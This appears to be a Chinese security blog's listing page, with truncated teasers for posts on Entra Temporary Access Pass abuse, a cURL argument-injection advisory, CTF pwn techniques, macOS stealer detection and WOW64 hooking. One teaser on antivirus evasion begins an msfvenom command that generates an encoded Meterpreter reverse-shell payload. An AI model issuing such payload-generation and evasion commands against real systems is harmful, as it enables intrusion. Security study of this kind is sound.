网络安全
未读
使用 Microsoft Entra 临时访问通行证进行横向移动和本地 NT 哈希转储
临时访问通行证是 Microsoft Entra ID(以前称为 Azure AD)管理员为用户帐户配置临时密码的一种方法,这也将满足多重身份验证控制。它们可以成为设置无密码身份验证方法(例如 FIDO 密钥和 Windows Hello)的有用工具。在本博客中,我们仔细研究了攻击者滥用临时访问通行
网络安全
未读
Windows 上的 Unicode 到 ASCII 转换可能导致参数注入等
我是 DEVCORE 研究团队的 splitline。我们最近在 cURL 上发现了一个漏洞。我们在最新版本的 cURL(curl-8.8.0_1)中重现了这些问题,并想向您报告。请查看附件文档了解详细信息。 此通告符合我们的漏洞披露政策,该政策将在 90 天后公开披露。我们的目标是确保漏洞能够及时
网络安全
未读
免杀对抗-C+go语言-混淆+防反编译+分离
C#&NET-ShellCode-生成/上线 一、生成: 1.msf生成C#语言的shellcode 命令:msfvenom-p windows/x64/meterpreter/reverse_tcp LHOST=192.168.206.192 LPORT=4444 -e x86/shikata_g
CTF
未读
PWN之栈溢出c语言中的危险函数和利用
栈溢出原理 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。发生栈溢出的基本前提是: 程序必须向栈上写入数据。 写入的数据大小没有被良好地控制。
CTF
未读
PWN-堆溢出UAF
一、UAF原理 UAF全称use after,其内容如名称,在free后再进行利用,UAF是堆结构漏洞的重要利用方式。原理如下: UAF漏洞大部分都出现在使用一个指针P去申请一个指定大小的chunk,而当free指针P以
CTF
未读
PWN格式化字符串漏洞
0x00 前言 格式化字符串漏洞是PWN题常见的考察点,仅次于栈溢出漏洞。 漏洞原因:程序使用了格式化字符串作为参数,并且格式化字符串为用户可控。 其中触发格式化字符串漏洞函数主要printf、sprintf、fprintf、prin等
CTF
未读
environ变量在用户态pwn的利用方式浅析
前言 在用户态的pwn题中,我们的最终目的都是劫持程序的执行流,可以说,一旦成功劫持程序执行流,就已经算pwn掉了这道题。 在栈题中,控制程序执行流是很简单的,只需要一个简单的溢出,因为栈本身就意味着程序的执行顺序,我们可以直接向里面写入数据,但是在堆题中,控制程序执行是一件相当麻烦的事情,以2.3
网络安全
未读
macOS 布谷鸟盗贼 |确保新样品快速出现时的检测和防御
一年多来,针对 macOS 设备的信息窃取者一直在上升,Atomic Stealer (Amos)、RealStealer (Realst)、
网络安全
未读
Hook深度研究:监视WOW64程序在系统中的执行情况【Part 3 结】
介绍 上次(第 1 部分、第 2 部分)我们演示了几种将 64 位模块注入 WoW64 进程的不同方法。这篇文章将从我们离开的地方继续,并描述如何利用在此类进程中执行 64 位代码的能力来挂接本机 x64 API。若要完成此任务,注入的 DLL 必须托管能够在 WoW64 进程的本机区域中运行的挂钩
网络安全
未读
Hook深度研究:监视WOW64程序在系统中的执行情况【Part 1】
介绍 这篇博文是一个由三部分组成的系列中的第一篇,描述了在尝试在 WoW64 应用程序(在 64 位 Windows 平台上运行的 32 位进程)中挂接本机 NTDLL 时必须克服的挑战。正如 许多其他来源所记录的那样,WoW64